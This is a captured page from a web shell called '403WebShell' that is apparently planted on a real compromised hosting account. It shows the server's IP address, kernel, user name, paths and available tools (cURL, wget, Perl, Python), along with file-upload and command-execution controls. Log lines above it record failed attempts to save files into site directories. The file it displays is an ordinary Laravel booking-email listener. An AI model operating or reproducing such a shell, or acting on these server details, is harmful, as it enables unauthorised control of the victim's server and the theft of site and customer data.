Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.191.238.6
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/Booking/Listeners/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/Booking/Listeners/EnquirySendListen.php
<?php
namespace Modules\Booking\Listeners;

use App\User;
use Modules\Booking\Emails\EnquirySendEmail;
use Modules\Booking\Events\EnquirySendEvent;
use Illuminate\Support\Facades\Mail;


class EnquirySendListen
{
    public function __construct()
    {

    }

    public const CODE = [
        'name'         => '[name]',
        'email'        => '[email]',
        'phone'        => '[phone]',
        'note'         => '[note]',
        'status'       => '[status]',
        'service_link' => '[service_link]',
        'service_name' => '[service_name]',
        'vendor_link'  => '[vendor_link]',
        'vendor_name'  => '[vendor_name]',
    ];

    /**
     * Handle the event.
     *
     * @param EnquirySendEvent $event
     * @return void
     */
    public function handle(EnquirySendEvent $event)
    {
        if (!empty(setting_item('booking_enquiry_enable_mail_to_vendor'))) {
            $body = $this->replaceContentEmail($event, setting_item_with_lang('booking_enquiry_mail_to_vendor_content'));
            Mail::to(User::find($event->enquiry->vendor_id))->send(new EnquirySendEmail($event->enquiry, $body, 'vendor'));
        }

        if (!empty(setting_item('admin_email') and !empty(setting_item('booking_enquiry_enable_mail_to_admin')))) {
            $body = $this->replaceContentEmail($event, setting_item_with_lang('booking_enquiry_mail_to_admin_content'));
            Mail::to(setting_item('admin_email'))->send(new EnquirySendEmail($event->enquiry, $body, 'admin'));
        }
    }

    public function replaceContentEmail($event, $content)
    {
        if (!empty($content)) {
            foreach (self::CODE as $item => $value) {
                switch ($value){
                    case "[service_link]":
                            $service = $event->enquiry->service;
                        $text = '<a href="'.$service->getDetailUrl().'" target="_blank"> '.$service->title.' </a>';
                        $content = str_ireplace($value, $text, $content);
                        break;
                    case "[service_name]":
                        $service = $event->enquiry->service;
                        $content = str_ireplace($value, $service->title, $content);
                        break;
                    case "[vendor_link]":
                        $user = $event->enquiry->vendor;
                        $text = '<a href="'.route('user.admin.detail',['id'=>$event->enquiry->vendor_id]).'" target="_blank"> '.$user->first_name." ".$user->last_name.' </a>';
                        $content = str_ireplace($value, $text, $content);
                        break;
                    case "[vendor_name]":
                        $user = $event->enquiry->vendor;
                        $text = $user->first_name." ".$user->last_name;
                        $content = str_ireplace($value, $text, $content);
                        break;
                    default:
                        $content = str_ireplace($value, @$event->enquiry->$item, $content);
                }
            }
        }
        return $content;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit